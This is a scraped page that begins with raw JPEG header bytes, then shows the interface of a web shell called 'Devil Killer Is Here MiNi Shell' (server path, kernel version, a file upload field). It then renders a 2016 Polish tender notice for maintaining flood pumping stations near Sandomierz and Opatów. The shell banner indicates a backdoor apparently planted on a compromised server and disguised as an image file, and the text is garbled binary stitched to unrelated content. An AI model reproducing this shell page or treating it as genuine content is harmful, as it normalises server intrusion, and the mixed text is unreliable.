JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161125/351648-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://szmiuw.kielce.com.pl/' target='_blank'>http://szmiuw.kielce.com.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 351648 - 2016
              z dnia 2016-11-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kielce: Bieżąca obsługa i eksploatacja pompowni przywałowych na terenie powiatu sandomierskiego i opatowskiego (Grabina, Zajeziorze, Szewce, Sandomierz Nadbrzezie, Kępa Chwałowska, Linów i Nowe)<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, krajowy numer identyfikacyjny
              368886031300, ul.
              ul. Witosa 
              86,
              25561  
              Kielce, woj.
              świętokrzyskie, państwo
              Polska, tel.
              041 3340105 wew. 209, 309, e-mail
              , faks
              041 3340105 wew. 409.
              <br />
              Adres strony internetowej (URL): http://szmiuw.kielce.com.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Wojewódzka Samorządowa Jednostka Organizacyjna Nieposiadająca Osobowości Prawnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://szmiuw.kielce.com.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://szmiuw.kielce.com.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę składa się pod rygorem nieważności w formie pisemnej<br />
                Adres:
                <br />Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach, ul. Witosa 86, 25 - 561 Kielce, pok. 217 (sekretariat)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Bieżąca obsługa i eksploatacja pompowni przywałowych na terenie powiatu sandomierskiego i opatowskiego (Grabina, Zajeziorze, Szewce, Sandomierz Nadbrzezie, Kępa Chwałowska, Linów i Nowe)<br /><b>Numer referencyjny: </b>ŚZMiUW.NO-NZ-3330/ 24 /16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia
Kod CPV 71311100-2 - Usługi dodatkowe w zakresie inżynierii lądowej i wodnej.

1.Nazwa przedmiotu zamówienia.

Bieżąca obsługa i eksploatacja pompowni przywałowych na terenie powiatu sandomierskiego i opatowskiego (Grabina, Zajeziorze, Szewce, Sandomierz Nadbrzezie, Kępa Chwałowska, Linów i Nowe)

2.Opis przedmiotu zamówienia

2.1 Przedmiotem zamówienia jest obsługa, eksploatacja oraz bieżąca konserwacja (bez kosztów energii elektrycznej) niżej wymienionych pompowni przywałowych zlokalizowanych na terenie powiatu Sandomierz.

1)Pompownia Sandomierz  Nadbrzezie, gm., pow. Sandomierz,  
2)Pompownia Kępa Chwałowska,gm. Dwikozy, pow. Sandomierz 
3)Pompownia Zajezierze,gm. Samborzec, pow. Sandomierz 
4)Pompownia Grabina,  gm. Łoniów, pow. Sandomierz 
5)Pompownia Szewce, gm. Samborzec, pow. Sandomierz 
6)Pompownia Linów, gm. Ożarów, pow. Opatów
7)Pompownia Nowe, gm. Ożarów, pow. Opatów.


2.1.1.Ogólne obowiązki przejmującego urządzenia przepompowni w eksploatację i bieżącą konserwację.

a)utrzymanie w stałej gotowości technicznej urządzeń (pomp) wraz z urządzeniami elektroenergetycznymi,
b)utrzymanie w dobrym stanie  technicznym urządzeń  towarzyszących: budynków i przepompowni wraz z terenem w granicach ogrodzenia, kanałów dopływowych 
odpływowych, zasilania energetycznego, dróg dojazdowych,
c)prowadzenie eksploatacji zgodnie z instrukcjami eksploatacyjnymi,
d)zatrudnienie odpowiedniej ilości pracowników, do obsługi urządzeń przepompowni posiadających odpowiednie kwalifikacje, 
e)zakup odpowiedniego sprzętu, narzędzi i materiałów, które są niezbędne do obsługi i eksploatacji oraz w przypadku awarii,
f)prowadzenie odpowiednich dokumentów wymaganych instrukcjami eksploatacyjnymi 
i wytycznymi podanymi w pkt 2.1.2, 
g)informowanie na bieżąco Zleceniodawcę o zauważonych zmianach i uszkodzeniach mających ujemny wpływ na bezpieczeństwo budowli, zainstalowanych urządzeń mechanicznych, pomp oraz elektrycznych,
h)pilnowanie aby osoby niepowołane nie miały dostępu do terenu pompowni.
i)ubezpieczenie pompowni wraz z wyposażeniem od kradzieży z włamaniem 
i rabunku oraz od powodzi, a także naprawa ewentualnych uszkodzeń w ramach otrzymanego ubezpieczenia,
j)udział przy kontrolach Urzędu Dozoru Technicznego urządzeń pompowni. Opłaty związane z dozorem technicznym ponosi Wykonawca.
k)zapewnienie odpowiedniego sprzętu do ratownictwa wodnego, p.poż. i BHP na każdej pompowni
l)nadzorujący eksploatację (osoba z uprawnieniami budowlanymi oraz osoba z uprawnieniami elektrycznymi dozorowymi D) w m-cu październiku dokonają oceny rocznej poszczególnych pompowni zgodnie z art. 62 ustawy Prawo budowlane.

2.1.2. Szczegółowe obowiązki przejmującego obsługę, eksploatację i bieżącą konserwację:

a)utrzymanie w stałej sprawności technicznej urządzeń (pomp, suwnic, zasilanie energetyczne) znajdujących się w pompowniach,
b)zakup odpowiednich smarów oraz olejów niezbędnych do właściwej pracy urządzeń (ilość smarów i olejów wg norm zużycia dla danego rodzaju urządzenia),
c)prowadzenia pomiarów i przeglądów urządzeń energetycznych oraz sprzętu 
p. pożarowego wg załączonej instrukcji,
d)prowadzenie bieżącej obsługi urządzeń zgodnie z obowiązującymi instrukcjami eksploatacyjnymi, które są do wglądu w przepompowni i u Zamawiającego,
e)prowadzenie codzienne Książki pracy pomp znajdującej się w przepompowni,
f)wykonywanie prac konserwacyjnych  bieżąca konserwacja. Zakres prac konserwacyjnych wyszczególniono w zał. nr 9 do SIWZ, 
g)udział w okresowym wiosennym przeglądzie oraz w razie zachodzących potrzeb,
h)Wykoszenie roślinności z powierzchni skarp zbiorników wyrównawczych każdej przepompowni ( utylizacja wykoszonej roślinności należy do Wykonawcy )  minimum 3 razy w roku w terminach uzgodnionych z Zamawiającym  działem TT; 
i).prowadzenie zgodnie z przepisami BHP prac związanych z bieżącą obsługą, ze szczególnym zwróceniem uwagi na: 

­osoby zatrudnione przy oczyszczaniu zanieczyszczeń zbiornika przy pompowni, które powinny umieć posługiwać się łodzią, pontonem, posiadać umiejętności ratownictwa tonących oraz być przeszkolonym w zakresie udzielania pierwszej pomocy,

­wszystkie prace wykonywane nad wodą oraz, przy których istnieje możliwość upadku do wody. Prace te winny być dokonywane z odpowiednią asekuracją. Najmniejsza ilość osób do w/w czynności to 2 osoby (nawet wtedy gdy dla danej pracy lub czynności wystarczy 1 osoba),

­osoby wykonujące odrąbywanie lodu wokół wylotów z przewodów rurowych od pompowni, które powinny być zabezpieczone pasami bezpieczeństwa,

­osoby usuwające zanieczyszczenia ze skarpy odwodnej pompowni oraz naprawiające jej ubezpieczenia. Prace te powinny odbywać się z rusztowania przystosowanego do pochylenia skarpy zaopatrzonego w poręcze i umocowanego do korony zapory czołowej przy pomocy liny,

­czynności związane z każdym uruchomieniem i zatrzymaniem pomp (obsługa powinna założyć rękawice dielektryczne i kalosze dielektryczne oraz sprawdzić czy nie powoduje zagrożenia bezpieczeństwa obsługi i otoczenia.)

h)wykonywanie czynności związanych z obsługą instalacji i urządzeń elektrycznych pompowni przy zachowaniu obowiązujących przepisów oraz zasad BHP przez pracowników posiadających stosowne doświadczenie i uprawnienia do poszczególnych czynności, a w szczególności:

­uprawnienia kwalifikacyjne na stanowisku E (eksploatacji) w zakresie urządzeń i instalacji elektroenergetycznych  do 1 kV

­uprawnienia kwalifikacyjne na stanowisku D (dozoru) w zakresie obsługi, konserwacji, remontów i montażu do 15 kV

Czynności te winny być wykonywane w taki sposób, aby każdą pompownię obsługiwała stale co najmniej jedna osoba z uprawnieniami grupy E). 

-Na etapie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo 
do kontroli, celem sprawdzenia czy umowa jest realizowana zgodnie z wytycznymi Zamawiającego podanymi m.in. w pkt. 2.1.2 lit i). 


UWAGA: Wszelkie szkody wynikłe na wskutek niewłaściwej eksploatacji przepompowni ponosić będzie przejmujący. 

j)nawiązanie bezpośredniego kontaktu w przypadku:
-nadejścia wielkich wód,
-awarii budowli lub urządzenia mechanicznego, czy elektrycznego,
-ogłoszenia pogotowia i alarmu przeciwpowodziowego, z jednostkami Zamawiającego tj. Świętokrzyskim Zarządem Melioracji i Urządzeń Wodnych R/O w Sandomierzu  tel. (15) 8334041

UWAGA: W przypadku ogłoszenia pogotowia lub alarmu przeciwpowodziowego przez Wojewódzkie Centrum Zarządzania Kryzysowego w Kielcach przejmujący pompownie musi być w stałej dyspozycji i wykonywać jego polecenia za pośrednictwem Świętokrzyskiego Zarządu Melioracji i Urządzeń Wodnych  w Kielcach, aż do czasu odwołania pogotowia.

Telefony Wojewódzkiego Centrum Zarządzania Kryzysowego w Kielcach  (41) 342 11 10, (41) 344 33 33.

Ponadto należy być w kontakcie: 
-z powiatowym zespołem reagowania kryzysowego w Sandomierzu i Opatowie,
-z odpowiednimi  gminami, na terenie których zlokalizowane są przepompownie,
-z Komendą Powiatową Państwowej Straży Pożarnej w Sandomierzu i Opatowie.

2.2Przedmiot zamówienia należy wykonać:

-na warunkach określonych niniejszą SIWZ  
-wzorem umowy 
oraz zgodnie z:
-warunkami Zamawiającego
-kartami informacyjnymi pompowni stanowiącymi załącznik do SIWZ 
-obowiązującymi przepisami BHP;
-warunkami technicznymi jakim powinny odpowiadać obiekty budownictwa wodnego;
-polskimi normami oraz obowiązującymi normami branżowymi, 
-przepisami prawa budowlanego.
     
2.3  Do zakresu zamówienia należy również wykonywanie prac konserwacyjnych wyszczególnionych w kartach informacyjnych pompowni stanowiących załącznik nr 9 do SIWZ  (odpowiednio dla danej pompowni).  

2.4 SIWZ wraz załącznikami zwane są dalej dokumentacją przetargową.


2.6. Wymóg zatrudnienia na podstawie umowy o pracę.  


2.6.1     Zgodnie z art. 29 ust. 3a ustawy p. z. p. Zamawiający określa w całym okresie realizacji zamówienia wymóg zatrudnienia przez Wykonawcę lub odpowiednio przez podwykonawcę na podstawie umowy o pracę  osób które będą bezpośrednio realizować przedmiot zamówienia, tj. sprawować stały    
dozór na poszczególnych pompowniach, co najmniej w zakresie: 
- prowadzenia ciągłej obsługi i bieżącej konserwacji pomp zgodnie z 
 instrukcją eksploatacji pompowni
-  prowadzenia codziennie Książki pracy pomp,

jeżeli wykonanie tych czynności polegać będzie na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974r.- Kodeks pracy ( Dz.U. z 2014r. poz. 1502, z późn. zm.). 
 
2.6.2  Czynności (osób bezpośrednio wykonujących zamówienie) niezbędne do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę dotyczą w szczególności: 
               sprawowania stałego dozoru na poszczególnych pompowniach, co najmniej w zakresie: 
- prowadzenia ciągłej obsługi i bieżącej konserwacji pomp zgodnie z instrukcją eksploatacji pompowni
-    prowadzenia codziennie Książki pracy pomp,

a) W nawiązaniu do określonego wyżej wymogu zatrudnienia na umowę o pracę osób dla bezpośredniej realizacji zamówienia przez zatrudnienie na podstawie umowy o pracę należy rozumieć zatrudnienie na podstawie: umowy o pracę, powołania, wyboru, mianowania lub spółdzielczej umowy o pracę, w rozumieniu ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2014 r., poz. 1502 ze zm.) lub właściwych przepisów państwa członkowskiego Unii Europejskiej lub Europejskiego Obszaru Gospodarczego, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
 
b) Wymagany okres zatrudnienia osób rozpoczyna się od momentu rozpoczęcia realizacji przedmiotu zamówienia, a kończy z dniem zakończenia realizacji przedmiotu zamówienia (umowy). Dla Podwykonawcy okres ten liczony jest od dnia zaakceptowania przez Zamawiającego podwykonawcy, do momentu zakończenia realizacji prac przewidzianych do wykonania w podwykonawstwie.

c)   Zatrudnienie przy realizacji zamówienia powinno trwać do końca jego realizacji. 
       W przypadku rozwiązania stosunku pracy przed zakończeniem tego okresu, Wykonawca lub podwykonawca będzie obowiązany do zatrudnienia na to miejsce innej osoby. Zamawiający ma prawo w każdym okresie realizacji zamówienia zwrócić się do Wykonawcy o przedstawienie dokumentacji zatrudnienia wymaganych osób, bądź zatrudnienia na podstawie umowy o pracę, zaś wykonawca ma obowiązek przedstawić ją niezwłocznie Zamawiającemu. 

d) Wykonawca w terminie do 5 dni od terminu wymaganego okresu zatrudnienia, o którym mowa w pkt. 2.6.2 lit b i na każde żądanie Zamawiającego będzie zobowiązany przedstawić Zamawiającemu wykaz osób, jak i do wglądu umowy o pracę (lub inne akty świadczące o nawiązaniu stosunku pracy) osób zatrudnionych w związku z wypełnieniem warunku realizacji zamówienia. 

Wykonawca powinien uzyskać od zatrudnionych pracowników zgodę na dostęp do danych osobowych przez Zamawiającego w celu prawidłowej realizacji umowy.

e)  Wykonawca dla swoich pracowników, jak także w odniesieniu do Podwykonawców będzie zobowiązany prowadzić ewidencję czasu pracy zatrudnionych pracowników dokumentującą świadczenie pracy w celu realizacji przedmiotu zamówienia i przedstawić ją na każde żądanie Zamawiającego.

f)  Wykonawca winien zagwarantować w każdej umowie z podwykonawcą, spełnienie warunków wynikających z zastosowania art. 29 ust. 3a ustawy Pzp.

g)  Wykonawca, zobowiązany jest w ciągu 5 dni roboczych po upływie każdego miesiąca przedłożyć Zamawiającemu, raport w przedmiocie spełnienia, warunków zatrudnienia pracowników wymaganych przez Zamawiającego, z podaniem nazwiska i imienia każdego pracownika Wykonawcy (z podziałem na podwykonawców i obiekty) oraz okresu czasu pracy wymaganych osób zatrudnionych przy wykonaniu zamówienia.

W przypadku niezatrudnienia przy realizacji zamówienia wymaganej przez Zamawiającego liczby osób lub nieprzedstawienia Zamawiającemu na jego żądanie umów o pracę lub ewidencji czasu pracy zatrudnionych pracowników dokumentujących świadczenie pracy w celu realizacji przedmiotu zamówienia, Wykonawca zapłaci Zamawiającemu stosowną karę umowną 

W przypadku wątpliwości, co do treści raportu Zamawiający zastrzega sobie prawo do kontroli sposobu wykonania zamówienia poprzez zbadanie rzeczywistych warunków jego wykonania.
<br /><br /><b>II.5) Główny kod CPV: </b>71311100-2<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>W przypadku, gdyby (po wyborze najkorzystniejszej oferty, zakończeniu ewentualnych procedur odwoławczych oraz zawarciu umowy) przekazanie terenu pompowni nastąpiło po dniu 31-12-2016 r.  termin rozpoczęcia realizacji przedmiotu zamówienia nastąpi dnia następującego po dniu ich protokolarnego przekazania. </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie formułuje warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie formułuje warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                
Na potwierdzenie spełniania w/w warunku udziału Wykonawca musi wykazać:


1)
Wykonanie lub wykonywanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie (przez czasookres nie krótszy niż 12 miesięcy) co najmniej jednej usługi o wartości brutto nie mniejszej niż 30 tys. zł lub dwóch usług o łącznej wartości brutto nie mniejszej niż 30 tys. zł - ustalonej za 12-miesięczny okres realizacji usługi lub dwóch usług polegającej na eksploatacji co najmniej dwóch pompowni przywałowych w tym :

­	minimum jednej pompowni o układzie pomp pionowym.
­	minimum jednej pompowni o układzie pomp poziomym.

W przypadku usług będących w trakcie realizacji wartość usługi ustala się wyłącznie za 12-miesięczny okres dotychczas zrealizowanej części usługi.


2)
dysponowanie osobą odpowiedzialną za realizację zamówienia, posiadającą wyższe wykształcenie, z uprawnieniami budowlanymi (do kierowania robotami) w specjalności konstrukcyjno-budowlanej w zakresie śródlądowych budowli hydrotechnicznych bądź obiektów budowlanych melioracji wodnych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniejszych przepisów, posiadającą doświadczenie w zakresie kierowania lub nadzorowania budowy lub eksploatacji pompowni przywałowych.


3)
dysponowanie minimum 1 osobą odpowiadającą za dozór nad urządzeniami elektroenergetycznymi posiadającą min. średnie wykształcenie, odpowiednie uprawnienia na stanowisku D (dozoru) w zakresie obsługi, konserwacji, remontów i montażu do 15 kV oraz posiadającą doświadczenie w zakresie nadzoru pompowni


4)
dysponowanie minimum 1 osobą na każdą pompownię, odpowiadającą za eksploatację urządzeń elektroenergetycznych, posiadającą min. zawodowe wykształcenie, odpowiednie uprawnienia kwalifikacyjne na stanowisku E (eksploatacji) w zakresie urządzeń i instalacji elektroenergetycznych do 1 kV oraz posiadającą doświadczenie w zakresie obsługi pompowni
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
